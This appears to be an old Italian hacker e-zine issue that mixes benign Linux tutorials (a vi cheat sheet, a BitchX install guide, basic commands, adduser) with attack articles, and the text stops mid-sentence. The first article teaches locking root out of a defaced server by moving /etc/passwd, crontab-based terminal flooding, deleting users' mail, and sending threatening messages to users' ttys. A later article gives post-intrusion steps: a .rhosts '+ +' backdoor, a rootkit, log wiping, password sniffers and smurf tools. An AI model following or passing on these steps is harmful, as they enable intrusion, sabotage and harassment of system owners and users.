Ovviamente (e aspettatamente) dal profondo del cuore un grosso fak alle
multinazionali...la caccia e' aperta...i buchi sono tanti...noi siamo in d+

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ SCHERZI SIMPATICI DA FARE AL SYSADMIN ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Articolo su scherzi simpatici da combinare al Sysadmin -CIAK 2-

PREMESSA: io non mi ritengo responsabile del cattivo uso delle informazioni
contenute in questo documento, che e' SOLO a scopo EDUCATIVO.

INTRODUZIONE: e' inutile negarlo, sto riscrivendo da capo quest'articolo dopo
una interruzione mentre l'avevo quasi finito... (con la storia che "Linux non
crasha mai"
mi ero abituato a non salvare... non ho tenuto in considerazione
un fulmine pero'...).
Beh, spero vi rendiate conto che se fate cose del genere non rimarrete certo
in ombra nel sistema... :)
OK, si comincia!

1- come far restare le pagine web modificate in linea per una vita :)
Allora, direi che molti di noi hanno provato almeno una volta a modificare le
pagine web di un sito.
Ma quante volte ci e' capitato che le nostre modifiche sparissero dopo poche
ore? molte... Grazie a questo trafiletto questo non succedera' PIU'!!!!
Allora, mettiamo che abbiamo appena finito di uppare le nostre pagine
modificate... Ora se il root joinasse si accorgerebbe subito dello scambio e
rimetterebbe le cose a posto. Quindi il nostro obiettivo e' impedire
che il root joini =)
Capisco che queste cose si ripercuoteranno sul vostro accesso, pero'... non
pensavate di mantenerlo, vero?
Dovete innanzitutto muovere /etc/passwd (mv /etc/passwd /percorsochevolete
/nomefile) in modo da non consentire l'accesso a nessuno (nel caso il sistema
sia dotato di shadow passwd, muovete quella). E se volessimo fare successive
modifiche alle nostre pagine? ok, eccovi accontentati: touch /etc/passwd e
poi aggiungeteci il vostro account. In questo modo potrete collegarvi solo
col vostro user e la vostra password :) (nel caso il sistema sia dotato di
shadow password, sara' necessario operare modifiche in entrambi i file).
Ora e' prevedibile un colpo di coda del sysadmin, che si trovera' ad un bivio:
o reinstallare tutto (in quanto non ha piu' accesso al sistema) oppure
hackerare il proprio sistema... (non pensate che lo faccia lui, chiamera' un
amico hacker). Quindi dobbiamo rendere il sistema inattaccabile! Visto che
non ci interessa mantenere altri servizi oltre al WWW, killate i processi
che implicano connessioni col mondo esterno (sendmail, pop3, ftp..) e
dedicatevi alla ricerca di CGI-BIN dannose per il sistema. Quando le avete
trovate eliminatele, poi cercatele di nuovo e fatevi consigliare da un amico
piu' esperto. A questo punto il sistema dovrebbe avere aperte le porte 23 e 80
(ed eventualmente potrete in seguito riaprire la 21 per i pochi minuti
necessari ad uppare le nuove pagine).
Per maggiore sicurezza (come se spostare il file della passwd non bastasse)
potete muovere il file /etc/securetty e poi fare un touch /etc/securetty in
modo da ricrearlo vuoto. Se fate questo pero' non avrete neppure voi l'accesso
al sistema, occhio! (direi che muovere i passwd e le shadow e' piu' che
sufficiente ndPk)
A questo punto chiamate tutti i vostri amici, parenti, conoscenti, mandate un
fax alle maggiori reti televisive e radiofoniche e invitate tutto il mondo a
visitare la vostra opera d'arte (scherzo, non fate i coglioni)!!!
Ad un certo punto se avete fatto un buon lavoro il sysadmin sara' costretto a
reinstallare tutto (non che sia una cosa gradevole da dire, ma certi siti
meriterebbero un format istantaneo), con poco gaudio da parte nostra che ci
avremo perso in immagine. Meditate gente, meditate...
PS: questa tecnica puo' essere usata per sospendere tutti i servizi di un
server. In questo caso killate pure httpd e non scrivete niente nel file
della password... Risultato: un server in coma! :)
ERGO: non fate i cazzoni... non fate tutto questo con tutti i siti che
trovate... giusto con quelli dei pedofili... ok?

Di seguito inseriro' altri scherzi carini per sopravvivere felici e
informatizzati :)

2- goliardia & crontab: un connubio perfetto :)
E' possibile far eseguire un file in un certo momento grazie a Crontab...
vi fa venire in mente niente questo? :)
Ad esempio immaginatevi un tranquillo server inglese... sono le ore 4:59 del
pomeriggio e 6 utenti, tra cui il root, sono placidamente collegati e si
fanno gli affari loro... tutto questa pace viene sconvolta pochi secondi
dopo: tutti gli utenti vedono apparire milioni di volte sul proprio schermo
la frase "It's time for tea!!!!!!!" e la rete diventa rallentatissima... gli
utenti cercano di stoppare il programma ma il lag e' cosi' enorme che ci
metteranno qualche decina di secondi a killarlo e intanto avranno terminato
quello che stavan facendo prima, a furia di ^C... Tutto questo ovviamente a
meno che il server non rebooti direttamente per la quantita' spropositata di
materiale inviato... Al termine della devastante operazione tutti si
renderanno conto di essere stati giocati da un hacker...
AHAHAHAHAHHAHAHAHAHAAH! Vi e' piaciuta la storia? Beh, grazie a crontab lo
potete fare anche voi! Cominciate a prendere il sorgente dello script di cui
parlavo:
------------------------cut-here----------------
#include <stdio.h>

int main() {
int n;
while (n = 2) {
printf("It's time for tea!!!!!!!!");
}
}
------------------------cut-here----------------
L'ho fatto io ma chiunque con un minimo di conoscienza lo potrebbe fare...
e' di una semplicita' disarmante e al tempo stesso piuttosto divertente :)
Bene, compilatelo con un nome che non dia nell'occhio e spostatevi in
/var/spool/crontab (o cron, a seconda delle versioni).
Qui troverete un numero variabile di file (da 0 a parecchi), i file che
regolano quando vengono eseguiti programmi in automatico!!!
Allora, prendete i login degli utenti dal file della pass (usate cat >
/etc/passwd) e inserite un
0 16 * * * /file/tea
Significa: Al primo minuto (0-59) delle ore 17 (0-23) esegui il file
/file/tea per questo utente.
Inserendolo per tutti gli utenti... :)
Per la cronaca, i campi asteriscati rappresentano giorno del mese, mese
dell'anno e giorno della settimana.
(man crontab).
Eh eh... bello :)

3- Filez interessanti:
/etc/motd Il messaggio del giorno.. c'e' da dire altro?
Implementazione 1: rm /etc/motd, cat /etc/passwd >> /etc/motd
Implementazione 2: echo "Oggi un hacker vi ha inculato a sangue" >> /etc/motd

/etc/issue Il messaggio prima del login
Implementazione 1: rm /etc/issue, echo "Mi sono preso la liberta' di
ridisegnare il sistema..."
>> /etc/issue

cartella /var/spool/mail
Implementazione 1: inserite in una o piu' mail frasi altamente offensive... :)
Implementazione 2: leggete le mail e cancellate quelle importanti... :)

4- messaggi senza mittente
Semplice ed utile a spaventare gli utenti inesperti :)
prendete il tty di un utente dal comando w, e usate:
echo "Sono un pedofilo... adesso vengo li' e ti inculo" >> /dev/tty (dove
tty e' il tty dell'utente)
Il bersaglio vedra' la frase tra le virgolette come se fosse l'output di un
comando... :)
Ovviamente un po di fantasia non guasta mai... se avete la fortuna di beccare
il root:
cat /etc/passwd >> /dev/tty
ihihihihihih poraccio :)
E' tutto limitato alla vostra fantasia... :)

Beh, abbiamo finito questa carrellata di piccole cattiverie... vi avviso pero'
che se fate qualcosa del genere a casaccio, giusto per provare, meritate di
bruciare in salamoia. Qualcuno di voi dira': bravo, e tu come le hai provate?
Sul mio sistema :(
Ihihihihih
pankrazio

[ps di zerocool bhe se non siete pazzi come il nostro amiko pank non fate mai
quello che e'descritto qua [per ovvvie ripercussioni legalizzzzzz [a meno che
non siate strabravissimiz]]].

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ TABELLUZZA DI VI ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Primo articolo in collaborazione col NobuZ...heheh
inutile dire che le mie dediche sono:

Thi$ aRt i$ dEd t0: FaRe le 5 di mattina leggendoci Zines e documenti
sull'hack crack...and a lotta otherS stuff.

tH|5 4rT |5 Vs-D3D To: Il sonno che fanno venire le BirroZZe.......
specialmente quando si arriva a non ricordare
quante se ne sono bevute.... ;)

Articolo....stampa--->taglia-&->tieni sempre a portata di mano!
_________________________________________________________________________
| TABELLUZZA VI by Dantuz & NobuZ |
|_________________________________________________________________________|
| Per Entrare in modalitÂ… di inserimento| Spostamento del cursore |
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
| i prima del cursore | nG alla linea n |
| dopo il cursore | l un posto a destra |
| l all'inizio della linea | spazio un posto a destra |
| A alla fine della linea | h un posto a sinistra |
| O apertura linea precedente | backspace un posto a sinistra |
| o apertura linea successiva | j una linea sotto |
| | + una linea sotto |
|_______________________________________| k una linea sopra |
| Delete | - una linea sopra |
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| $ fine di linea |
| dw cancella la parola | . ^ inizio di linea |
| dd cancella la linea | w parola successiva |
| D fino alla fine della linea | e fine di parola |
| x carttere sul cursore | b parola precedente |
| | |
|_______________________________________|_________________________________|
| Altre funzioni | Sostituzione |
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
| u annulla ultima modifica | cw sostituzione di parola
| / ricerca in avanti | cc sostituzione di linea|
| ? ricerca a ritroso | C fino a fine di linea |
| n istanza successiva | r carattere sul cursore|
| . ripete l'ultima azione | R fino a escape |
| Y accantona la linea |_________________________________|
| y accantona la linea | Controllo del video |
| p inserisci sotto |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
| P inserisci sopra | CTRL-D scorrimento video in |
| " marcatore | avanti |
| ZZ scrive ed esce | CTRL-U scorrimento video a |
| esc cancella il comando | ritroso |
|_______________________________________| CTRL-F schermata successiva |
| Modalita' di ultima linea | CTRL-B schermata precedente |
|^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^| CTRL-L riformazione del video
| :w scrive file |_________________________________|
| :q esce | In modalita' inserimento |
| :wq scrive ed esce |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
| :n file successivo | Backspace cancella carattere |
| :r legge il file | CTRL-W cancella parola |
| :e elabora il file | esc modalita' comando |
| :f nome del file |_________________________________|
| CTRL-G nome del file | Cazzate |
| :set modifca le opzioni |^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^|
| .! uscita allo shell | Mi e' avanzato lo spazio e mi |
| :n linea n | sembrava brutto lasciarlo vuoto |
| :addr salta alla linea addr | allora ci ho scritto 2 caxxate |
|_______________________________________|_________________________________|

Benissimo....la tabella ve la stamperete e ritaglierete e magari l'avrete
sempre accanto al computer...ma il resto dell'articolo lo cestinerete
subito dopo....quindi che caxxo lo scrivo a fare ?? boh?!?!?!?!
Unico mio consiglio Š quello di imparare ad usare bene questo criptico
programma dato che se vi doveste trovare in un qualsiasi sistema Unix-like
l'editor in cui di sicuro incapperete sara' questo....certo ce ne sono
molti altri e molto + semplici ma il "
vi" e' lo standard...
imparare ad usarlo e' d'obbligo...bye bye
Bisogna studiare la normalita' per riuscire ad essere veramente anormali !

Dante Alighieri.....N0bodY88......NewBies Staff........

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ MINI GUIDA ALL'INSTALLAZIONE DI BITCHX SOTTO UNIX OS ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

by \JusTme\
______________________________________________________________

Sito ufficiale da cui si puo' scaricare BitchX: ftp.bitchx.com

Elenco degli OS su cui puo' girare BitchX:

-Windows 95/98/NT
-BSDI 2.0/2.1/3.0
-SunOS 4.1.4/5.3/5.4/5.5/5.5.1
-Linux [Tutte]
-IRIX
-HP-UX 9.x/10.x
-OSF/1 [DEC Alpha]
-FreeBSD
-DEC Unix
-Ultrix
-AIX

Ok lo so che potete benissimo leggervi la documentazione su BitchX e le
varie FAQ (e vi rimando a queste se dopo aver seguito i comandi sotto
riportati dovessero sorgere dei problemi di compilazione a causa dell' OS
o per qualche altro motivo) ma per i neofiti che vogliono installare il
BitchX sul loro bel Linuzzo fresco fresco di configurazione ppp e che si
sono rotti i coglioni di quello schifo di X-Chat che gira sotto XWindows
perche' sembra uno stupido client fatto in VB o in Delphi e perche' gli
mancano troppe opzioni, credo sia molto piu' semplice e veloce seguire
questi pochi comandi per l'installazione. Oltre a questo ho spesso avuto
modo di vedere gente su IRC lamentarsi perche' non riusciva a installare
BitchX. Poi, a voi la scelta ;)
Ok, let`z go..
Scaricate il file ircii-pana-xx-xx.tar.gz dal sito FTP ed eseguite questi
comandi da root:
gzip -d ircii-pana-xx-xx.tar.gz
tar xvf ircii-pana-xx-xx.tar.gz
CD ./BitchX
./configure
make
make install

A questo punto, se tutto e' andato come doveva, troverete il vostro BitchX
in /usr/local/bin.
Un'altra cosa.. date un'occhiata a /BitchX/include/config.h in cui potete
impostare i vari settaggi come ad esempio i server di default a cui
collegarsi. Vi sono poi altri files (dei quali non sto a dirvi il nome
perche' sono decisamente intuitivi nella dir /BitchX in cui potete settare
i vari quits, kicks, ecc.. fumate e bevete un bel po' e inventatevi delle
belle frasi sklerate.
Una volta collegati vi chiederete di sicuro come cambiare il vostro Name
(N.d.A. la frasetta idiota che viene visualizzata nel whois per inciso..).
Beh dato che il vostro ident sara' l'user da cui state facendo girare
BitchX (mi auguro che non sia root :P) e' chiaro che andrete ad editarvi il
vostro bel file delle pass e nella riga dell' account che state usando
scrivete quello che vi pare prima della shell.
Esempio pratico (raga vi devo proprio dire tutto? :P) =

coatto:Xq0sm27alVwi5I:500:500:Te vojo nuda:/home/coatto:/bin/bash

In cui "
Te vojo nuda" sara' il vostro name e "coatto" sara' chiaramente
l'ident e il nickname di default (si'.. ovviamente lo potrete cambiare il
nick quando sarete su IRC :P)
Quando farete girare BitchX per la prima volta non spaventatevi se non e'
proprio intuitiva l'interfaccia utente come lo e' per il mIRC su Winbloz ad
esempio, imparerete velocemente dato che grosso modo i comandi tipici di
IRC come join, quit, whois, nick, ecc.. sono gli stessi. Vi do solo
qualche dritta iniziale per non perdervi all'inizio (se poi non ce la fate
proprio lasciate perdere tutto e vendete il pc eheh).
Ok, siete collegati al server IRC, fate /j #canale e appena ci entrerete
vedrete subito un elenco dei nicks, il topic e i settaggi (+stn ad es.);
ora siete sicuramente in preda al panico perche' non capite come fare ad
aprire piu' finestre dei canali o delle query.. niente panico, digitate
/window new hide (tante volte quante finestre volete). Se fate Alt+2
passerete ad una schermata vuota, li' digitate /q nick per una query oppure
/j #canale2 per un altro canale, se fate Alt+3 passerete alla terza
schermata vuota e li' farete lo stesso se volete aprire una query o un
canale (se avevate creato la nuova finestra con /window new hide). Per
passare da una finestra all'altra fate sempre Alt+numero_finestra; se
volete ad esempio chiudere una query in una finestra, spostatevi li' e
digitate /q , quella finestra e' di nuovo vuota e potrete usarla per aprire
un'altra query o un canale.
Ancora una cosa, se volete di nuovo vedere l'elenco dei nicks in un canale
(dato che vi verranno mostrati solo al join) fate /scan nel canale.
Queste sono le cose essenziali che dovete sapere all'inizio per muovervi
ed ambientarvi.. il resto, se non siete completamente negati, lo
imparerete da voi usando BitchX ;)

Cya on IRC guyz!

\JusTme\
(Linux forever)

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME CI SI MUOVE IN LINUX ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ciao :)) Questo articolo e' dedicato a tutti i "
neofiti" di *nix nel vero
senso della parola, cioe' quelli che appena lo hanno installato e hanno
visto "
login: " si sono imballati :P
Beh appena vedete la scritta "
login: " e' ovvio che dovete inserire il
vostro username, o anche la parolina magika "
root" seguiti dalla
rispettiva password [che sapete solo voi, vero? :D]. Se mettete come login
"
root" vorra' dire che avrete accesso al sistema operativo come
amministratore, e cioe' con tutti i permessi possibili. Detto questo,
passiamo a una piccola rassegna dei comandi principali, magari facendo un
piccolo raffronto con i comandi MS-Dos.
Iniziamo va':

Comando *nix Comando DOS Funzione associata

cd cd cambia directory
cp copy copia alcuni file
mv move oppure ren muove file oppure li rinomina
cat type visualizza il contenuto di un file
rm del cancella alcuni file
rm -rf deltree cancella sottodir e filez
ls dir /w visualizza il contenuto di una dir
ls -l dir come sopra, ma piu' dettagliato

Beh penso che questi x un inizio possano bastare... almeno sarete in grado
di fare qualche danno ;D
Per ottenere la sintassi di

  
questi comandi basta fare NOMECOMANDO --help e
il mondo sara' ai vostri piedi :D cmq se conoscete il DOS non dovrete
essere in grossa difficolta'... ricordatevi del fatto che *nix e' un OS
case sensitive, cioe' distingue le maiuscole dalle minuscole... quindi
attenzione :P
Altro piccolo suggerimento... secondo me l'interfaccia grafica non serve a
un cazz ma se la volete configurare e utilizzare ABBASTANZA velocemente
basta scrivere xf86config, rispondere al terzo grado, e poi quando sarete
di nuovo al prompt dei comandi scrivete startx... ma potete benissimo
vivere senza... a sto punto Linux diventera' Microsoft Linux :D
Bah penso che x stavolta ho terminato le mie fatiche... ci si sente al
prox articolo raga'... ciauz :)))

St0rM BriNgeR

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COME SI CREA UN NUOVO UTENTE IN LINUX ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ciao :)) sono sempre io :))
Stavolta giusto due righe x farvi capire la modalita' d'uso del comando
adduser...
Beh diciamo che sto comando serve a creare un nuovo utente [seee ma va'
non l'avevo capito :D], e a modificare tutte le caratteristiche di questo
utente, come gruppo di appartenenza e cazzi vari.
Facendo adduser senza parametri otteniamo:

[root@localhost /root]# adduser
usage: adduser [-u uid [-o]] [-g group] [-G group,...]
[-d home] [-s shell] [-c comment] [-m [-k template]]
[-f inactive] [-e expire mm/dd/yy] [-p passwd] [-n] [-r]
name
adduser -D [-g group] [-b base] [-s shell] [-f inactive] [-e
expire mm/dd/yy]

a questo punto cerchiamo di spiegare tutte le opzioni che ci ha sparato...
dunque, la prima distinzione da fare riguarda l'uso del parametro -D o
meno... se questo viene usato andremo a sovrascrivere il file di default
dei parametri del comando adduser... se invece non utilizzeremo questa
opzione, andremo a creare un utente a seconda dei parametri inseriti nella
linea di comando.

-u [uid] = setta l'uid dell'utente [ma non mi dire! :D]
-g [group] = setta il gruppo di appartenenza dell'utente
-G = lista di gruppi supplementari a cui l'utente puo' appartenere [boh]
-d [home] = setta la homedir del nostro user
-s [shell] = setta la shell di partenza del nostro utente
-c [comment] = un commento x il nostro utente [adduser -c lamer St0rM :D]
-m = crea la homedir se questa non esiste [almeno io cosi' ho capito..]
-f = numero di giorni di inattivita' necessari a disattivare la pass
-e = data di scadenza dell'utente [e che e' una busta di latte? :D]
-p [passwd] = la password dell'utente [kebbbbbello !!! :D]
-n = crea un nuovo gruppo con lo stesso nome dell'utente
-r = usata x creare un account di sistema [non vi servira' mai :P]

beh penso che abbiamo concluso... SPERO :P cmq imparatelo a usare sto
comando che vi servira' quando otterrete una root ;) Ciauz ci si sente al
prox articolo !! :D

St0rM BriNgeR

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ COSA FARE DOPO AVER OTTENUTO ACCESSO AD UNA SHELL ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Ciao :)) Beh questo piccolo articolo vuole descrivere a grandi linee le
fasi da compiere x mantenere x un po di tempo l'accesso a una shell...
piccola premessa: se voi bucate una shell senza molta fatica vorra' dire
che l'admin e' lamer, e quindi vi dovrete regolare di conseguenza. Se
invece la shell ve la passano oppure avete impiegato molto tempo a
bucarla.. vuol dire che l'admin capisce qualcosa di *nix e quindi state
MOLTO piu' attenti.
Bhe iniziamo va':

- Una volta ottenuto accesso a una shell una delle prime cose da fare e'
secondo me osservare un po il sistema e le directory principali, come
/usr/bin e altro. Fingerate il sistema a periodi, e vedete se l'admin e'
spesso online o quanti e quali utenti si trovano sul pc nei vari momenti
della giornata.
- Se l'admin e' un po lamer potete mettere gia' la backdoor del .rhosts
con i + + dentro, cosicche' avrete accesso alla shell anche tramite
rlogin.
- Dopo di questo, secondo me la prima cosa da fare e' r00tare. Non vi fate
prendere dalla smania di mettere un bot un bnc un qualsiasicosa che vi
possa far sgamare.
- Una volta ottenuto accesso di root tramite un exploit che VOI vi sarete
cercati e trovati, oppure in un qualsiasi altro modo che vi garba, io
direi di piazzare un r00tkit e uno zap x eliminare qualche log e qualsiasi
traccia della vostra presenza.
- Ovviamente, anche altri computer avranno accesso al nostro bel server...
e anche questi computerz hanno delle passwd ;D io vi consiglio di mettere
uno bello sniffer in modo che da una shell otterrete altre shellz senza
fatica :)) bello no? :D
- Una volta fatto questo.. possiamo occuparci delle patch. Se vogliamo,
possiamo lavorare x l'admin in modo che il nostro sistema diventi piu'
sicuro. Ad esempio, se siamo entrati con un sendmail non recente, possiamo
aggiornarlo :)) ma x questo ci vuole un po di pratica, quindi se siete
newbies x davvero lasciate stare :) basta che non sputtaniate la shell...
- Oki, possiamo dire che siamo quasi a posto... OOOOPPPPSSSSSS dimenticavo
la cosa piu' divertente, le backdoor :D se l'admin vi sgama e vi caccia
dal suo sistema, convinto che non ci tornerete piu'... beh si sbaglia di
grosso! :D piazzate qualche backdoor in caso vi occorrano... e poi appena
perderete l'accesso e ci tornerete sopra, mettete un bel messaggino tipo
"L'hacker che ti ha bucato il sys e' tornato e ti ha fottuto x l'ennesima
volta hiihihhi :D"
nel motd o nell'issue, cosi' gli utenti si divertiranno
a prendere x il culo il loro admin :D
- Beh, fatti questi lavori viene il bello di avere una shell, e cioe'
utilizzarla :D Potete fare quello che volete... mettere un bot, mettere un
bnc, uploadare uno smurf, uno scanner tipo mscan, insomma la shell e'
vostra e ci farete quello che vorrete. Mi raccomando, non fate ste cose
con l'account di root altrimenti vi farete sgamare :D

Beh, direi che con questo posso concludere... ci sentiamo al prox articolo
ciauz :)))

St0rM BriNgeR

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ FILOSOFIA DI UNIX ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Allora siete anche voi di quelli che hanno iniziato da poco e che si sono
sentiti subito consigliare di usare linux e di studiarsi l'unix? Bene allora
questa intro a unix fa x voi. Se avete sempre "vissuto" in windows e 'unica
password che avete mai visto e' quella x entrare nel vs win95-98 (che poi
tra l'altro basta fare esc e l'ostacolo e' saltato) allora dovete abituarvi
alla filosofia unix. In unix e in linux gli utenti sono divisi in due
categorie principali: lo, o in alcuni casi gli, superuser che hanno accessi
privilegiati e fanno il bello e il cattivo tempo, e gli user o utenti normali
che come avrete capito hanno dei poteri limitati sia nei permessi di accesso
a determinati file che nell'accesso in alcun dirctory diciamo particolari.
Da qui potete quindi capire qual'e' la sfida che brucia negli occhi di ogni
hacker, wannabe et simili, cioe' il poter raggiungere il grado + alto di
potere nel (proprio o non, non fa differenza x chi smanetta) sistema. Ma
torniamo un attimo indietro. In unix il superuser si chiama root ank se alcune
volte usa una "copertura" entrando nel sistema come user normale x vedere se
qualcuno crea casini o x vedere chi si collega alle 4 di mattina a una
universita'... Sia l'utente normale che il superuser devono avere una password
composta da minimo 3 caratteri e maximo 8 caratteri (ahh... i bei tempi dei
vax/vms con le pass da 25 caratteri!!!) i quali possono essere numeri e
lettere sia maiuscole che minuscole. Ah, per precisione va detto che gente
che il 90% degli user (o forse di + ma non mi voglio sbilanciare) usa
password di sole lettere minuscole quindi capite anke voi che e' facile
decrittare qualke password prese da un vecchio passwd o qualke nuovo shadow
non tanto x meriti ma + che altro x la stupidita' o anke solo x ignoranza
(dato che non possiamo definire stupidi chi non conosce se no molti di noi
credo che sarebbero stupidi eheheh), la quale ignoranza pero' rischia di
compromettere il sistema al primo attacco di qualke voglioessereuncracker che
forte della sua "potenza" non vede l'ora x darsi alla formattazione rapida
o ad una + godibile distruzion e cancellazion random.
Ricordate quindi di usare pass con lettere e numeri ma soprattutto usate sia
lettere minuscole che lettere maiuscole dato che ho conoscuto + di una persona
